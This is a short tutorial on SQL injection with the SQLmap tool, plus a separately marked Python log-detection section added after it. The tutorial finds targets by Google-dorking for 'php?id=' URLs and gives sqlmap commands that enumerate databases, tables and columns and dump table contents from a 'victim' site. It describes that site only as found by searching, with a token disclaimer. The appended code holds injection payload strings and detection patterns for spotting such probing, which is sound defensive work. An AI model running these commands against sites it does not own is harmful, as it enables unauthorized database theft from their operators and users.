By: tyga-tyga
June 13, 2016

SQL Injection Using SQLmap - [PART 1]

SQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.

SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h.

Requirements:
- Basic understanding of SQL
- SQLmap
- Common Sense

This is for educational and research purposes only! Do not attempt to violate the law with anything contained here.

Step 1: Identifying the Target

To find a possibly vulnerable site, we'll Google dork search the term: "php?id=". A dork is an advanced search using Google parameters such as "", site:, and filetype:

A potentially vulnerable site looks something like this: https://mytarget.com/info.php?id=1

Step 2: Database Enumeration

Now that we found a target, let's identify the databases.
sqlmap -u $url --batch --dbs
Where $url is the target URL.

[Screenshots: sqlmap1, sqlmap2]

We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --tables -D $databasename
Where $url is the Victim URL and $databasename is the name of the database.

[Screenshots: sqlmap3, sqlmap4]

With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablename
Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table.

[Screenshots: sqlmap5, sqlmap6]

Step 3: The Dump

Now that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablename
And, we'll get something like this:

[Screenshots: sqlmap7, sqlmap8]

That's it! I'll be posting again, so stay tuned!

Bonus: Here's a list of other popular Google dork queries.
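Seen from the defending side, the enumeration in Steps 2 and 3 leaves traces in the web server's access log. The following is an added example, not part of the original post: it flags requests that look like automated SQL injection probing of a query parameter such as id. The log lines, regexes and function names are constructed for illustration, and the markers are heuristics, not a complete signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic markers (assumptions for this example, not an exhaustive rule set).
UA_MARKER = re.compile(r"sqlmap", re.I)  # sqlmap's default User-Agent names the tool
PAYLOAD_MARKERS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "boolean_test": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}
# Combined log format: ip - - [ts] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)

# Constructed sample log lines (documentation IP range, made-up requests).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jun/2016:10:00:01 +0000] "GET /info.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Jun/2016:10:00:02 +0000] "GET /info.php?id=1%20AND%205=5 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (http://sqlmap.org)"',
    '203.0.113.9 - - [13/Jun/2016:10:00:03 +0000] "GET /info.php?id=1%20UNION%20ALL%20SELECT%20NULL,schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def flag_request(line):
    """Return (client_ip, sorted reasons) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status, ua = m.groups()
    reasons = set()
    # The User-Agent is client-controlled, so it is only one signal among several.
    if UA_MARKER.search(ua):
        reasons.add("sqlmap_user_agent")
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for label, rx in PAYLOAD_MARKERS.items():
            if rx.search(value):
                reasons.add(label)
    return (ip, sorted(reasons)) if reasons else None

def suspicious_clients(lines):
    """Aggregate the reasons per client IP across many log lines."""
    hits = {}
    for line in lines:
        flagged = flag_request(line)
        if flagged:
            hits.setdefault(flagged[0], set()).update(flagged[1])
    return {ip: sorted(reasons) for ip, reasons in hits.items()}
```

Detection only shows that probing happened; the fix for an injectable id parameter is a parameterized query on the server side.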
